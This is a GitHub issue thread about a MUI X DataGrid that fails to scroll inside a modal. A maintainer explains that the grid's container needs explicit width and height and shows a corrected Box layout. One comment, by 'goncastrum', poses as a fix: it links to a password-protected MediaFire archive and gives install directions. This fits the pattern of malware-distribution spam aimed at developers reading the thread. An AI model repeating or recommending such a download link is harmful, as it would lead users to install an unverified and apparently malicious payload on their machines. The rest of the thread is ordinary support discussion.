### ISSUE TITLE
[data grid] scroll not working inside modal

### ISSUE THREAD

**Issue by igortas** [mui/mui-x#14449]
### Steps to reproduce

Link to live example: (required)

Steps:
1. Create simple modal
2. Add data grid with adding minHeight and minWidth options and populate the grid with some sample data and wrap inside as box as children
3. Try to scroll

### Current behavior

Scroll not working at all when table is part of a modal, tried on different browsers

### Expected behavior

Scroll should work when table is inside modal.

### Your environment

System:
    OS: Linux 5.15 Ubuntu 24.04 LTS 24.04 LTS (Noble Numbat)
  Binaries:
    Node: 22.6.0 - ~/.nvm/versions/node/v22.6.0/bin/node
    npm: 10.8.2 - ~/.nvm/versions/node/v22.6.0/bin/npm
    pnpm: Not Found
  Browsers:
    Chrome: Not Found
  npmPackages:
    @emotion/react: ^11.13.3 => 11.13.3 
    @emotion/styled: ^11.13.0 => 11.13.0 
    @mui/base:  5.0.0-beta.58 
    @mui/core-downloads-tracker:  6.0.1 
    @mui/icons-material: ^6.0.1 => 6.0.1 
    @mui/lab: ^6.0.0-beta.8 => 6.0.0-beta.8 
    @mui/material: ^6.0.1 => 6.0.1 
    @mui/private-theming:  6.0.1 
    @mui/styled-engine:  6.0.1 
    @mui/system:  6.0.1 
    @mui/types:  7.2.16 
    @mui/utils:  5.16.6 
    @mui/x-data-grid:  7.15.0 
    @mui/x-data-grid-premium: ~7.15.0 => 7.15.0 
    @mui/x-data-grid-pro:  7.15.0 
    @mui/x-internals:  7.15.0 
    @mui/x-license:  7.15.0 
    @mui/x-license-pro: ^6.10.2 => 6.10.2 
    @mui/x-tree-view: ~7.15.0 => 7.15.0 
    @types/react: ^18.3.5 => 18.3.5 
    react: ^18.3.1 => 18.3.1 
    react-dom: ^18.3.1 => 18.3.1 
    styled-components:  5.3.11 
    typescript: ^5.5.4 => 5.5.4 

**Search keywords**: grid scroll modal

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by michelengelen** [comment]
To help us diagnose the issue efficiently, could you provide a **stripped-down** reproduction test case using the latest version? A live example would be fantastic! ✨ 

For your convenience, our documentation offers templates and guides on creating targeted examples: [Support - Bug reproduction](https://mui.com/x/introduction/support/#bug-reproductions)

Just a friendly reminder: clean, functional code with minimal dependencies is most helpful. Complex code can make it tougher to pinpoint the exact issue.  Sometimes, simply going through the process of creating a minimal reproduction can even clarify the problem itself!

Thanks for your understanding! 🙇🏼

**Comment by igortas** [comment]
Hi @michelengelen 
I've created simple demo. Take a look, still in the example scrolling not working.
https://codesandbox.io/p/sandbox/nifty-currying-8hcgrm?file=%2Fsrc%2FDemo.tsx%3A120%2C54

**Comment by michelengelen** [comment]
I get it now... you are facing this since the container holding the grid does not have intrinsic dimensions. This necessity is [clearly stated in the docs](https://mui.com/x/react-data-grid/layout/). If you give the modal the dimensions to calculate the render- and scrollerzones it will work as intended:

```tsx
<Box
  bgcolor="background.paper"
  sx={{
    padding: '1rem',
    position: 'absolute',
    top: '50%',
    left: '50%',
    transform: 'translate(-50%, -50%)',
    width: '95%',
    height: '50vh',
  }}
>
  <DataGrid rows={rows} columns={columns} />
</Box>
```

**Comment by igortas** [comment]
@michelengelen I will try this, in v6 of ```mui-x``` this was working as I've provided the demo.
